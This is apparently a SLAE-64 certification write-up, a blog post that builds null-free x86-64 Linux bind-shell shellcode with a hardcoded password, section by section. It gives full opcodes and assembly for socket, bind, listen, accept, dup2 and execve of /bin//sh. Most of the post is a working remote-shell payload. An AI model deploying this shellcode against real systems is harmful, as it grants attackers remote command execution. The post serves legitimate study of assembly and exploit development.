Tags: assembly, slae-64, shellcode
This post is the first of seven that will comprise my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. Each post will correspond to one of the seven assignments, which vary in difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving into OSCE.
I used nasmshell to figure out which instruction combinations produced the fewest bytes without any nulls. For this assignment, I only used techniques taught within the course or that I came across in documentation; I didn’t look at other shellcode examples beyond what the course covered. My reasoning was that this would establish a performance baseline for myself. After I complete some of the other assignments that require me to analyze other people’s shellcode, I plan to come back and apply whatever fancy tricks I pick up to this shellcode.
The general steps to set up a listening socket map onto a handful of Linux syscalls: socket, bind, listen, and accept.
After the accept syscall, operations such as recv/read and send/write may be performed on the socket. If you’re looking for a more in-depth explanation of socket programming using syscalls, do yourself a favor and check out Beej’s Guide to Network Programming.
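As a rough illustration of that sequence, here is a minimal Python sketch that performs the same four steps through the standard socket module. The function names open_listener and accept_one are my own for illustration, and the default of port 0 (let the kernel pick a free port) is an assumption made so the sketch can run anywhere; the shellcode in this post binds to 4444.

```python
import socket

def open_listener(host="127.0.0.1", port=0, backlog=1):
    """Create, bind, and listen on a TCP socket (hypothetical helper)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # socket(2)
    srv.bind((host, port))                                   # bind(2)
    srv.listen(backlog)                                      # listen(2)
    return srv

def accept_one(srv):
    """Block until one client connects, then return its socket and address."""
    client, addr = srv.accept()                              # accept(2)
    return client, addr
```

Once accept_one returns, the client socket can be read from and written to with recv and sendall, which is the point at which the shellcode goes on to read the password.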
To pass parameters to a syscall (since that is all this post is concerned with), up to six registers may be used. In the order in which they are populated, they are rdi, rsi, rdx, r10, r8, and r9. The syscall number itself is stored in rax.
The following image illustrates how the arguments in a C function definition, read from left to right, correspond directly to the registers above. I show this as a quick reference to assist in reading the assembly and syscall definitions below.
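To make the mapping concrete, here is a small Python sketch that pairs a syscall number and its C arguments with registers, following the x86-64 Linux syscall convention (rax for the number, then rdi, rsi, rdx, r10, r8, r9). The helper name assign_registers is hypothetical; it only models the convention and does not execute anything.

```python
# Argument registers for x86-64 Linux syscalls, in left-to-right order.
SYSCALL_ARG_REGISTERS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")

def assign_registers(number, *args):
    """Return a dict showing which register holds which value."""
    if len(args) > len(SYSCALL_ARG_REGISTERS):
        raise ValueError("a syscall takes at most six arguments")
    regs = {"rax": number}                         # syscall number
    regs.update(zip(SYSCALL_ARG_REGISTERS, args))  # arguments, left to right
    return regs
```

For example, assign_registers(41, 2, 1, 0) models socket(AF_INET, SOCK_STREAM, 0) and yields rax=41, rdi=2, rsi=1, rdx=0.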
The first step in creating a bind shell on Linux is to create a socket. Below you can see that the syscall number for socket is 41 and that it takes three ints as arguments. socket() creates an endpoint for communication and returns a file descriptor that refers to that endpoint.
#define __NR_socket 41
int socket(int domain, int type, int protocol);
/*
* rax -> 41 -> socket syscall
* rdi -> 2 (AF_INET) -> domain
* rsi -> 1 (SOCK_STREAM) -> type
* rdx -> 0 -> protocol
*/
Python can be used to determine the values of the constants you would normally see used in C socket programming code.
>>> import socket
>>> socket.AF_INET
2
>>> socket.SOCK_STREAM
1
>>> socket.INADDR_ANY
0
First up, the original shellcode with null bytes. On the left are the opcodes generated by the corresponding assembly instructions on the right. The gist of this snippet is that a socket is created with the socket syscall and the resulting file descriptor is stored in the rdi register. The resulting shellcode takes 25 bytes to make this single syscall, and it is riddled with null bytes.
b8 29 00 00 00 mov eax,0x29
bf 02 00 00 00 mov edi,0x2
be 01 00 00 00 mov esi,0x1
ba 00 00 00 00 mov edx,0x0
0f 05 syscall
48 89 c7 mov rdi,rax
Here is what I was able to come up with. 14 bytes long and no nulls.
6a 29 push 0x29
58 pop rax
6a 02 push 0x2
5f pop rdi
6a 01 push 0x1
5e pop rsi
31 d2 xor edx,edx
0f 05 syscall
97 xchg edi,eax ; store file descriptor in rdi
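A quick way to double-check the byte and null counts is to paste the opcode columns into Python. This is just a sketch built from the two listings above; the names ORIGINAL, REWRITTEN, and summarize are my own.

```python
# Opcode bytes copied from the two listings above, one string per instruction.
ORIGINAL = bytes.fromhex(
    "b829000000" "bf02000000" "be01000000" "ba00000000" "0f05" "4889c7"
)
REWRITTEN = bytes.fromhex("6a2958" "6a025f" "6a015e" "31d2" "0f05" "97")

def summarize(code):
    """Return (total length, number of null bytes) for a blob of shellcode."""
    return len(code), code.count(0)
```

summarize(ORIGINAL) gives (25, 13) and summarize(REWRITTEN) gives (14, 0), so more than half of the original snippet was null bytes.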
When a socket is created with socket(), it exists in a name space (address family) but has no address assigned to it. bind() assigns the address specified by addr to the socket referred to by the file descriptor sockfd. This and all following sections follow the same pattern as the first, where the socket was created.
#define __NR_bind 49
int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
/* rax -> 49
* rdi -> fd already stored in rdi
* rsi -> pointer to 16 bytes of space groomed to contain a sockaddr_in struct
* rdx -> length of rsi (16)
*/
struct sockaddr_in {
sa_family_t sin_family; /* address family: AF_INET */
in_port_t sin_port; /* port in network byte order */
struct in_addr sin_addr; /* internet address */
};
Python can be used to convert a numeric port number into a format that sockaddr_in will understand.
>>> import socket
>>> port = 4444
>>> hex(socket.htons(port))
'0x5c11'
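To see how that value ends up inside the 16 bytes handed to bind, here is a hedged sketch that packs a sockaddr_in by hand. It assumes a little-endian host (as on x86-64) for the family field and includes the 8 bytes of zero padding that bring the struct up to 16 bytes; pack_sockaddr_in is a name I made up.

```python
import socket
import struct

def pack_sockaddr_in(port, addr="0.0.0.0"):
    """Pack a 16-byte sockaddr_in as it would sit in memory on x86-64."""
    family = struct.pack("<H", socket.AF_INET)  # host byte order (little-endian)
    port_be = struct.pack(">H", port)           # network byte order (big-endian)
    ip = socket.inet_aton(addr)                 # 4 bytes, 0.0.0.0 is INADDR_ANY
    padding = b"\x00" * 8                       # pads the struct to 16 bytes
    return family + port_be + ip + padding
```

The port bytes in memory are 11 5c. Storing the 16-bit word 0x5c11 on a little-endian machine writes exactly those two bytes, which is why the htons result can be used directly as an immediate in the assembly.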
Original shellcode: 41 bytes
; prepare the 16 bytes to pass as sockaddr using the stack
48 31 c0 xor rax,rax
50 push rax
89 44 24 fc mov DWORD PTR [rsp-0x4],eax
66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
66 c7 44 24 f8 02 00 mov WORD PTR [rsp-0x8],0x2
48 83 ec 08 sub rsp,0x8
; make bind syscall
b8 31 00 00 00 mov eax,0x31
48 89 e6 mov rsi,rsp
ba 10 00 00 00 mov edx,0x10
0f 05 syscall
My shellcode: 24 bytes
; prepare the 16 bytes to pass as sockaddr using the stack
; 2 pushes to get the 00 in between 0x5c11 and 02
52 push rdx
52 push rdx
66 c7 44 24 02 11 5c mov WORD PTR [rsp+0x2],0x5c11
c6 04 24 02 mov BYTE PTR [rsp],0x2
48 89 e6 mov rsi,rsp
; make bind syscall
6a 31 push 0x31
58 pop rax
6a 10 push 0x10
5a pop rdx
0f 05 syscall
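The stack grooming in my version can be modelled with a bytearray. This is only a simulation of the four memory-touching instructions, and it assumes rdx is still zero from the socket section; index 0 of the bytearray stands in for rsp.

```python
def build_sockaddr_on_stack():
    """Simulate the pushes and stores that build sockaddr_in at rsp."""
    stack = bytearray()
    # push rdx (twice): rdx is assumed to be 0, and each push places
    # 8 new bytes at the (lower) address that rsp now points to.
    stack[:0] = (0).to_bytes(8, "little")
    stack[:0] = (0).to_bytes(8, "little")
    # mov WORD PTR [rsp+0x2],0x5c11 -> bytes 11 5c (port 4444, network order)
    stack[2:4] = (0x5c11).to_bytes(2, "little")
    # mov BYTE PTR [rsp],0x2 -> AF_INET; the byte at [rsp+1] stays 00
    stack[0] = 0x02
    return bytes(stack)
```

The result is 02 00 11 5c followed by twelve zero bytes, so writing a single byte for the family avoids the 02 00 immediate that put a null into the original.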
listen() marks the socket referred to by sockfd as a passive socket, that is, as a socket that will be used to accept incoming connection requests using accept(2).
#define __NR_listen 50
int listen(int sockfd, int backlog);
/* rax -> 50
* rdi -> fd already stored in rdi
* rsi -> 1
*/
Original shellcode: 12 bytes
b8 32 00 00 00 mov eax,0x32
be 02 00 00 00 mov esi,0x2
0f 05 syscall
My shellcode: 8 bytes
6a 32 push 0x32
58 pop rax
6a 01 push 0x1
5e pop rsi
0f 05 syscall
The accept() system call is used with connection-based socket types (SOCK_STREAM, SOCK_SEQPACKET). It extracts the first connection request on the queue of pending connections for the listening socket, sockfd, creates a new connected socket, and returns a new file descriptor referring to that socket. The newly created socket is not in the listening state. The original socket sockfd is unaffected by this call.
The argument sockfd is a socket that has been created with socket(), bound to a local address with bind(), and is listening for connections after a listen().
#define __NR_accept 43
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
/* rax -> 43
* rdi -> fd already stored in rdi
* rsi -> pointer to 16 bytes of space that will be populated by the client connection
* rdx -> pointer to length of rsi (16)
*/
struct sockaddr_in {
sa_family_t sin_family; /* address family: AF_INET */
in_port_t sin_port; /* port in network byte order */
struct in_addr sin_addr; /* internet address */
};
Original shellcode: 29 bytes
b8 2b 00 00 00 mov eax,0x2b
48 83 ec 10 sub rsp,0x10
48 89 e6 mov rsi,rsp
c6 44 24 ff 10 mov BYTE PTR [rsp-0x1],0x10
48 83 ec 01 sub rsp,0x1
48 89 e2 mov rdx,rsp
0f 05 syscall
49 89 c1 mov r9,rax
My shellcode: 19 bytes
6a 2b push 0x2b
58 pop rax
99 cdq ; zero out rdx using sign extension
52 push rdx
52 push rdx
48 89 e6 mov rsi,rsp ; rsi -> buffer that accept fills with the client's address
6a 10 push 0x10
48 8d 14 24 lea rdx,[rsp]
0f 05 syscall
; store client socket descriptor in r9 to restore after closing the parent
49 91 xchg r9,rax
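The cdq trick only works because eax holds a small positive number at that point. A tiny model of the instruction shows why; the function below is my own sketch of the edx result, not anything from the course.

```python
def cdq(eax):
    """Return the value cdq leaves in edx: the sign bit of eax copied 32 times."""
    eax &= 0xFFFFFFFF
    return 0xFFFFFFFF if eax & 0x80000000 else 0
```

With eax = 0x2b the sign bit is clear, so edx becomes 0, and because a write to edx clears the upper half of rdx, the whole register ends up zeroed in a single byte of shellcode. If eax had its top bit set, edx would be 0xFFFFFFFF instead.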
This is the first section where I added logic to satisfy the authentication requirement. The close_call label gets reused in the event of a bad password. close() closes a file descriptor, so that it no longer refers to any file and may be reused.
#define __NR_close 3
int close(int fd);
/* rax -> 3
* rdi -> fd already stored in rdi
*/
Original shellcode: 10 bytes
b8 03 00 00 00 mov eax,0x3
0f 05 syscall
4c 89 cf mov rdi,r9
My shellcode: 15 bytes
6a 03 push 0x3
58 pop rax
0f 05 syscall
; restore client socket descriptor to rdi
4c 89 cf mov rdi,r9
; close gracefully if we get here from a bad password
74 07 je 4000d2 <read_call>
6a 3c push 0x3c
58 pop rax
0f 05 syscall
For this section, there is no original shellcode. I’ll just outline what mine is doing. read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.
#define __NR_read 0
ssize_t read(int fd, void *buf, size_t count);
/* rax -> 0
* rdi -> client already stored in rdi
* rsi -> 24 bytes allocated should be good
* rdx -> 24
*/
Python can be used to prepare the password to be stored on the stack.
>>> import binascii
>>> binascii.hexlify(b'letmein\n'[::-1])
'0a6e69656d74656c'
I wrote a small bash function that wraps the Python above so that I don’t have to open an interactive interpreter each time I want a different string.
flipstring() {
python3 -c "import binascii; print(binascii.hexlify(b'${1}'[::-1]).decode())"
}
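The reversal is really just a little-endian conversion, so the same value can be produced with int.from_bytes. A minimal sketch, with password_to_qword as a made-up helper name and the 8-byte length check as my own assumption about what fits in a single movabs:

```python
def password_to_qword(password):
    """Return the 64-bit immediate that stores `password` in memory order."""
    if len(password) != 8:
        raise ValueError("password must be exactly 8 bytes to fill one register")
    # Little-endian: the first character ends up in the lowest byte.
    return int.from_bytes(password, "little")
```

format(password_to_qword(b"letmein\n"), "016x") returns '0a6e69656d74656c', matching the hexlify output above.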
The two primary tasks here are to get user input and compare it to our password.
; read the password
31 c0 xor eax,eax ; zero out rax for the syscall number
48 83 ec 18 sub rsp,0x18 ; allocate 24 bytes on the stack
48 89 e6 mov rsi,rsp ; make rsi point to those 24 bytes
6a 18 push 0x18
5a pop rdx ; store the size of the buffer in rdx
0f 05 syscall
; compare the password
48 b8 6c 65 74 6d 65 movabs rax,0xa6e69656d74656c ; password -> letmein\n
69 6e 0a
48 8d 3e lea rdi,[rsi] ; point rdi at the user input
48 af scas rax,QWORD PTR es:[rdi] ; compare rax with the 8 bytes at [rdi]
4c 89 cf mov rdi,r9 ; put client connection back in rdi
75 cf jne 4000c1 <close_call> ; close socket if they're not equal
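Since scas with a QWORD operand compares exactly eight bytes, the check can be sketched in Python as a comparison against the first eight bytes of the read buffer. The names PASSWORD and password_matches are mine, and the sketch ignores whatever stale data the real stack buffer might hold beyond what read returned.

```python
PASSWORD = b"letmein\n"

def password_matches(buf):
    """Mimic the scas check: only the first 8 bytes of the input are compared."""
    return buf[:8] == PASSWORD
```

One consequence is that anything sent after the first eight bytes is not part of the check, so b"letmein\nwhoami\n" passes just like b"letmein\n" does.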
The dup2() system call creates a copy of the file descriptor oldfd, using the file descriptor number specified in newfd rather than the lowest-numbered unused descriptor that dup() would pick. After a successful return, the old and new file descriptors may be used interchangeably.
#define __NR_dup2 33
int dup2(int oldfd, int newfd);
/* rax -> 33
* rdi -> client socket
* rsi -> 2 -> 1 -> 0 (3 iterations)
*/
Original shellcode: 36 bytes
b8 21 00 00 00 mov eax,0x21
be 00 00 00 00 mov esi,0x0
0f 05 syscall
b8 21 00 00 00 mov eax,0x21
be 01 00 00 00 mov esi,0x1
0f 05 syscall
b8 21 00 00 00 mov eax,0x21
be 02 00 00 00 mov esi,0x2
0f 05 syscall
My shellcode: 20 bytes
As a side note, I really thought I was going to be able to make a small loop reusing rcx as the file descriptor, but it didn’t turn out quite the way I thought it would. I think this is a place in the code that I will return to for some easy improvement later.
6a 03 push 0x3
59 pop rcx ; # of iterations
6a 02 push 0x2
5b pop rbx ; used as file descriptor
00000000004000f8 <dup2_loop>:
6a 21 push 0x21
58 pop rax
89 de mov esi,ebx ; 2 -> 1 -> 0 (3 iterations)
51 push rcx ; preserve counter across syscalls
0f 05 syscall
59 pop rcx
48 ff cb dec rbx
e2 f2 loop 4000f8 <dup2_loop>
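To convince myself the loop issues the right three calls, it can be traced in Python. This is a simulation of the register values only; dup2_calls is a hypothetical helper and client_fd stands in for whatever descriptor is sitting in rdi.

```python
def dup2_calls(client_fd):
    """Trace the (rax, rdi, rsi) triples the dup2 loop passes to syscall."""
    calls = []
    rcx, rbx = 3, 2                # iteration counter, current newfd
    while True:
        calls.append((0x21, client_fd, rbx))  # dup2(client_fd, rbx)
        rbx -= 1                   # dec rbx
        rcx -= 1                   # loop: decrement rcx, jump if non-zero
        if rcx == 0:
            break
    return calls
```

dup2_calls(4) returns [(33, 4, 2), (33, 4, 1), (33, 4, 0)], meaning stderr, stdout, and stdin are each pointed at the client socket in turn. The push/pop around the syscall in the real code is needed because the syscall instruction overwrites rcx.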
I modified this section a bit, but there wasn’t a whole lot of room for improvement that I could see. execve() executes the program pointed to by filename.
#define __NR_execve 59
int execve(const char *filename, char *const argv[], char *const envp[]);
/* rax -> 59
* rdi -> "/bin//sh", 0x0
* rsi -> [addr of "/bin//sh"], 0x0
* rdx -> 0x0
*/
Original shellcode: 32 bytes
48 31 c0 xor rax,rax
50 push rax
48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
2f 73 68
53 push rbx
48 89 e7 mov rdi,rsp
50 push rax
48 89 e2 mov rdx,rsp
57 push rdi
48 89 e6 mov rsi,rsp
48 83 c0 3b add rax,0x3b
0f 05 syscall
My shellcode: 28 bytes
31 d2 xor edx,edx
52 push rdx
48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
2f 73 68
53 push rbx
48 89 e7 mov rdi,rsp
52 push rdx
57 push rdi
48 89 e6 mov rsi,rsp
48 8d 42 3b lea rax,[rdx+0x3b]
0f 05 syscall
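The doubled slash in /bin//sh is there to make the path exactly eight bytes, so it fills one register with no padding. A short sketch of the encoding, where encode_path is a name of my own and zero-padding short paths is an assumption used only to show where a null would appear:

```python
def encode_path(path):
    """Return (qword immediate, contains_null) for a path of up to 8 bytes."""
    if len(path) > 8:
        raise ValueError("path does not fit in a single 64-bit register")
    padded = path.ljust(8, b"\x00")          # shorter paths need zero padding
    return int.from_bytes(padded, "little"), b"\x00" in padded
```

encode_path(b"/bin//sh") gives 0x68732f2f6e69622f with no null byte, whereas encode_path(b"/bin/sh") would need a padding null in the top byte. The kernel treats the extra slash as a single separator, so both paths resolve to the same file.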
Once the call to execve happens, the client has a shell on the system. As for the compression and null-removal part of the assignment, the nulls were successfully removed, and the final tally of bytes:
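The per-section byte counts quoted throughout this post can be added up with a few lines of Python. This is a sketch that sums only the sections where both an original and a rewritten count are stated, so the read/compare section (which has no original counterpart and no stated count) is left out, and the close figure for my version includes the extra exit logic.

```python
# (original bytes, my bytes) as stated in each section of this post.
SECTION_BYTES = {
    "socket": (25, 14),
    "bind": (41, 24),
    "listen": (12, 8),
    "accept": (29, 19),
    "close": (10, 15),
    "dup2": (36, 20),
    "execve": (32, 28),
}

def tally(sections):
    """Return (total original bytes, total rewritten bytes)."""
    original = sum(o for o, _ in sections.values())
    rewritten = sum(r for _, r in sections.values())
    return original, rewritten
```

tally(SECTION_BYTES) returns (185, 128) for these seven sections.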
I’m still confident that there is a lot of room for improvement on my part. My plan is to revisit the first and second assignments and apply any new concepts I learn while performing the shellcode analysis of later assignments. Feel free to check out the source code.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: E64-1584
My SLAE-64 Assignments Repository